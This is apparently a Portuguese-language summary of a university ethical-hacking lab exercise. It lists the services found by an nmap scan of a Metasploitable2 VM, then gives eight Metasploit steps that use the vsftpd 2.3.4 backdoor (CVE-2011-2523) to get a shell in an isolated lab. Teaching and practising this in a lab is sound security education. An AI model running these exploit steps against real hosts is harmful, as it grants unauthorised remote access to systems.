
Avaliação de Hacking Ético | Teste prático de vulnerabilidade do backdoor vsftpd 2.3.4 (CVE-2011-2523) no Metasploitable2 usando Kali Linux & Metasploit
Módulo: - Ethical Hacking Universidade: London Metropolitan University Programa: BSc (Hons) Cyber Security and Forensic Science
Todas as atividades foram realizadas em um laboratório virtual controlado e isolado, apenas para fins educacionais. Nenhum sistema real foi alvo. Todo o trabalho está em conformidade com o Computer Misuse Act 1990.
Porta 21/tcp - vsftpd 2.3.4 (ALVO) Porta 22/tcp - OpenSSH 4.7p1 Porta 23/tcp - Linux telnetd Porta 80/tcp - Apache httpd 2.2.8 Porta 139/tcp - Samba smbd 3.X Porta 445/tcp - Samba smbd 3.X Porta 3306/tcp - MySQL 5.0.51a Porta 6667/tcp - UnrealIRCd
Passo 1: nmap -sn 192.168.56.0/24 Passo 2: nmap -sV 192.168.56.103 Passo 3: msfconsole Passo 4: use exploit/unix/ftp/vsftpd_234_backdoor Passo 5: set RHOSTS 192.168.56.103 Passo 6: set LHOST 192.168.56.1 Passo 7: run Passo 8: id && whoami